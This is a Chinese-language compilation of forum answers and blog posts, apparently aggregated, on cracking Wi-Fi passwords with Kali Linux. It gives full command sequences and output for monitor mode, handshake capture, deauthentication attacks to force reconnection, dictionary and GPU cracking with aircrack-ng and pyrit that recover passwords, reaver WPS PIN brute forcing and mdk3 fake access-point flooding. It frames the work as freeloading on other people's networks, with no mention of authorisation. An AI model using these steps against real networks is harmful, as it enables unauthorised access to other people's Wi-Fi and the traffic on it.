A. 怎麼用kali linux破wifi
首先在台式機上一定要有一個無線網卡,可以是插在主板上的無線網卡,也可以是USB介面的外置無線網卡,但是最好是Kali Linux支持的型號,不然驅動程序的問題很麻煩,X寶上有的賣。
再說Kali,Kali Linux上破解WIFI的工具非常全面,因為Kali有無線滲透測試的功能,但是系統性的學習還是挺麻煩的,一條條的調用命令破解步驟也比較繁瑣,非專業滲透測試人員推薦用一個Kali上面用於無線滲透測試的傻瓜型自動化腳本,那就是wifite。
wifite命令是用於無線滲透測試的自動化測試腳本,它是個python腳本,用於自動化調用kali上面的各種無線測試工具,像是reaver、aircrack-ng等。它會先嘗試PIN碼破解wifi,當無法用PIN碼破解時,會嘗試抓取wifi驗證握手包,然後用Kali上的字典進行握手包的暴力破解。PIN碼破解的時間一般比較短,握手包的暴力破解會用GPU來加速,破解的速度取決於主機的性能配置(還有密碼的復雜程度)。
wifite的使用方法:直接在終端輸入命令wifite,它會調用aircrack-ng打開網卡的監聽模式並掃描附近的無線網路並一一顯示出來,等它顯示一會兒後按下鍵盤上的Ctrl+C組合鍵,它會中斷對無線網的掃描並讓你選擇破解的目標網路,這時輸入要破解的網路的序號(注意是序號,是個數字)並按下回車,它就會自動進行破解工作,破解過程可能很長,也可能會失敗,等到破解完成會有相應的提示。
B. kail linux 怎麼破解無線
首先需要有一台運行kali linux的機器,無論是虛擬機或物理機,一塊支持監聽模式的無線網卡
root@kali:~# iwconfig wlan1 IEEE 802.11bg ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off eth0 no wireless extensions.lo no wireless extensions.
查看無線網卡設備名
root@kali:~# airmon-ng start wlan1Found 2 processes that could cause trouble.If airomp-ng, aireplay-ng or airtun-ng stops working aftera short period of time, you may want to kill (some of) them!-e PID Name2772 dhclient4415 wpa_supplicantInterface Chipset Driverwlan1 Realtek RTL8187L rtl8187 - [phy0] (monitor mode enabled on mon0)
進入監聽模式
airomp-ng mon0 會列出搜索到的所有無線網路
從中找到你要測試破解的,下來BSSID
root@kali:~/test# airomp-ng -w nenew -c 11 --bssid E4:D3:32:41:56:12 mon0 CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID E4:D3:32:41:56:12 -44 53 171 7 0 11 54e. WPA2 CCMP PSK TP-LINK_5612 BSSID STATION PWR Rate Lost Frames Probe E4:D3:32:41:56:12 00:00:00:00:00:00 0 0 - 1 0 18135 E4:D3:32:41:56:12 64:B4:73:40:60:5C -21 1e- 6e 0 7
當看到WPA handshake:說明抓到了握手包,就可以來破解了
如果一直抓不到,可以用如下命令來攻擊,強迫重新握手
aireplay-ng -0 10 -a E4:D3:32:41:56:12 -c 64:B4:73:40:60:5C mon0 --ignore-negative-one
抓到握手包後,就可以用字典來跑密碼了。
root@kali:~/test# aircrack-ng -w ./password.txt nenew-21.cap Opening nenew-21.capRead 18654 packets. # BSSID ESSID Encryption 1 D0:C7:C0:6E:53:53 TP-LINK_5353 WPA (1 handshake)Choosing first network as target.Opening nenew-21.capReading packets, please wait...
跑的速度如何取決於你機器的性能,更取決於你的字典
如果用物理機,有比較好的顯卡,還可以用顯卡來加速破解,效率比cpu高的多
kali linux下裝顯卡驅動,sdk等,參考如下鏈接
http://xiao106347.blog.163.com/blog/static/2159920782013113013549364
http://vistb.net/2011/08/how-to-crack-wifi-part-four/
http://blog.sina.com.cn/s/blog_56a70c040101exje.html
我這里用顯卡,很快就跑出了密碼
root@kali:~# pyrit -r nenew-21.cap -i password.txt -b D0:C7:C0:6E:53:53 attack_passthroughPyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.comThis code is distributed under the GNU General Public License v3+Parsing file 'nenew-21.cap' (1/1)...Parsed 14 packets (14 802.11-packets), got 1 AP(s)Tried 4420221 PMKs so far; 86496 PMKs per second.The password is 'qq123789'.
C. WIFI密碼破解姿勢總結(1)
WiFi的時代,蹭WiFi成為了一項基本"生存技能"。外出出差時,你想搞點事情,毫無疑問,wifi作為目標是最好的選擇。
SSID:服務集標識符,用來標識某一無線區域網的唯一標識
WAP:無線應用協議,利用它可以把網路上的信息傳遞到無線通信終端
AP:無限訪問點或接入點,客戶需連接AP才能獲得登陸
WEP:802.11定義下的一種加密方式
WPA:常見的無線網路認證之一
Station:站點,網路最基本的組成部門,通常指無線客戶端
BSSID:基本服務單元ID,通常顯示為接入點的MAC地址
信道:對頻段進一步的劃分,通信的通道,是信號傳輸的媒介
信道寬度:例如有20MHZ,40MHZ等,表示一個信道的寬度
抓包:將網路傳輸發送與接受的數據包進行捕獲,重發,編輯等操作
CDLinux
KaliLinux
無線網卡
路由器加密有WEP,WPA/WPA2等加密方式,目前WEP加密方式基本已經沒有了,常見都是WPA/WPA2這種加密方式,而我們進行破解,也就是利用字典去撞密碼。
打開minidwep-gtk,如果提示如下,需要先設置網卡
插入無線網卡後,連接一下即可
打開後點擊掃描
可以看到尾號有wps的,我們可以利用PIN碼進行破解
了解:Pin碼為8位數的數字組合,一共為11000個,分為前半段4位10000個,後半段3位1000個(最後一位沒用),所有隻用3位來排列,就只有1000個,一共就是10000+1000=110000。而根據第一位為順序也並不需要全部走完11000個,當跑pin碼時,前面四位成功定位後,進度會自動跳到百分九十,PIN碼破解能百分百破解出,所以此方法最省時省力
而後面有MAC地址的這種是指有客戶端連接,可以抓取手握包利用字典跑密碼
選擇wps的利用PIN碼破解,點擊Reaver
看到數值有變化,就表示可以破解
建議選取穩定的wifi,不然有時候嘗試到正確值時,可能因為網路原因,導致失敗。
90%此時表示前四位全部正確,下圖則得到wifi密碼,以及pin碼
而如果選擇wpa/wpa2,我們直接點擊啟動
這個時候它就會自己抓取握手包,當抓到握手包會提示
握手包需要對方有大的流量操作,如看電影,如果流量過小,可能抓取不到
最後點擊跑字典,選擇握手包,再選擇字典就開始了
一般幾分鍾就能跑到密碼了。
還是和剛才一樣,先插入無線網卡
利用FeedingBottle奶瓶來進行破解,打開後選擇YES
選擇網卡後,點擊Next
點擊Scan進行掃描周圍wifi
這個畫面有點似曾相識,沒錯,它就時集成了airomp-ng
掃描完成後,我們盡量去選擇有用戶連接在的wifi,看箭頭指示地方
如果目標wifi沒有用戶連接,我們可以先選擇,它會自動等待上線,抓取握手包
繼續接著點擊Next
點擊Start開始,會提示讓你選擇字典
選擇好字典後,則會自動開始,自動抓取握手包,當抓取到後會自動跑字典
下圖則得到密碼為zeppelin
下一章講其他兩個WIFI破解姿勢。
D. 過時的wifi破解工具
之前我們講過了fluxion和aircrack破解wifi的方法
其實還有很多的wifi破解方式,不妨都試試。知曉每一個工具的優缺點,在合適的情境下去選擇最適合的方法
不幸的是下面講的這些破解方法基本已經成了古董了,只可遠觀而不可褻玩焉。
因為已經不怎麼管用了...
如果想了解wifi歷史的人可以繼續接著看下去,其他的嘛就快點去看其他文章吧
弄這么多不能用的wifi有什麼用呢?之後我們在知道釣魚wifi的時候會用到,這里我們先講一下
mdk3 wlan1 b -f FakeAPName.txt -c 2
只需要這么一句話
下面開始我的失敗嘗試了,願意看的請留下聽我講述歷史...
其實看看也好,可以避免你們繼續這樣失敗的嘗試,少浪費一些時間
現在路由器防pin真的是防的很好,我pin了至少30次,只pin出來過機房的很老的一台路由器,其他的總是被pin死,看來這11000次也並不想想像中那樣脆弱。這是我做完這次實驗的感受
reaver是通過路由器上一個叫做wps的功能來實現攻擊的,WPS是許多路由器上都有的一個功能,可以為用戶提供簡單的配置過程,它與設備中硬編碼保存的一個PIN碼綁定在一起。Reaver利用的就是PIN碼的一個缺陷,最終的結果就是,只要有足夠的時間,它就能破解WPA或WPA2的密碼。
根據pin碼破解的原理,可以看到只需要枚舉11000種情況就會必然破解出pin碼,從而通過pin得到wifi密碼。 具體的為什麼是11000種情況呢?
現在開始實現
1.將網卡調到監聽模式
打開終端輸入 airmon-ng start wlan0
2.掃描開啟wps的路由器。
輸入 wash -i wlan0mon
WPS Locked為No的就是開啟wps服務的路由器,都可以嘗試攻擊
3.找到了開啟WPS的wifi,接下來咱們就可以進行pin碼爆破,下面主要說一下reaver的參數。
reaver 命令:
reaver -i mon0 -b mac -S -v
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
應因狀況調整參數(-c後面都已目標頻道為1作為例子)
選擇之前掃描出來的開啟WPS的wifi,選擇一個進行破解。
輸入: reaver -i wlan1 -b 54:E6:FC:35:C5:82 -S -N -vv -c 4
在窮舉的過程中,reaver會生成以路由mac地址為名的wpc文件,這個文件在kali系統中/etc/reaver/文件夾下。
一時半會pin不出來,過段時間pin的時候命令加參數 -s file.wpc,就會根據之前的進度繼續pin。
最後pin完最後會顯示WPS PIN(正確的pin碼)和WPA PSK(wifi密碼),同時如果WPS功能沒關,pin碼沒修改,無論怎樣修改密碼,都可以通過pin碼獲取wifi密碼: reaver -i wlan0mon -b mac -p pin 碼,來再次得到密碼
一般pin的過快,會把路由器pin死,所以 一般還會加上-d5 -t5參數 ,添加5秒延時,當然數值可以自己改。我添加了也照樣被pin的死死的。不行了這個軟體
很看好他,來試一下
1.打開終端輸入wifite
2.我選擇了all
3.結果一個也沒整出來,他也是用的wps的來破解,現在用wps針對除了很老的路由器,其他的都不是很好辦了
圖形化界面,大家一看就會懂, 先選擇網卡,掃描,破解
說一下主界面的右下角有一個 toolbox工具箱
試試
破解不好用,而且一打開他整個虛擬機都變得有些卡,破解的進度條根本不走
不推薦
我們來試一下他的這些附件
也都不管用,不知道是不是因為使用了https的緣故,反正他現在肯定是out了
參考的一些網站
七夜
freebuf
E. kali linux 怎麼破解無線網路密碼
首先,虛擬機內是無法使用內置無線網卡的,如果在虛擬機上用kali破解wifi,是需要usb無線網卡的。
在kali裡面破解無線網:在終端輸入命令wifite,它會打開網卡的監聽模式並掃描附近的無線網顯示出來,顯示一會兒後按下鍵盤上的ctrl+c組合鍵,它會讓你選擇破解的目標網路,這時輸入序號(數字),它就會自動進行破解工作,破解完成有提示。
原理:wifite命令是無線滲透測試的自動化腳本,它實際上是個python腳本,用於自動化調用kali上面的各種工具,像是reaver、aircrack-ng等。它先嘗試pin碼破解,無法用pin碼破解時,會嘗試抓取握手包,用字典進行握手包的暴力破解。pin碼破解的時間比較短,握手包的暴力破解可能會用gpu加速,取決於主機的性能和密碼的復雜程度,虛擬機對握手包暴力破解很無力(性能局限),就指望pin碼破解了。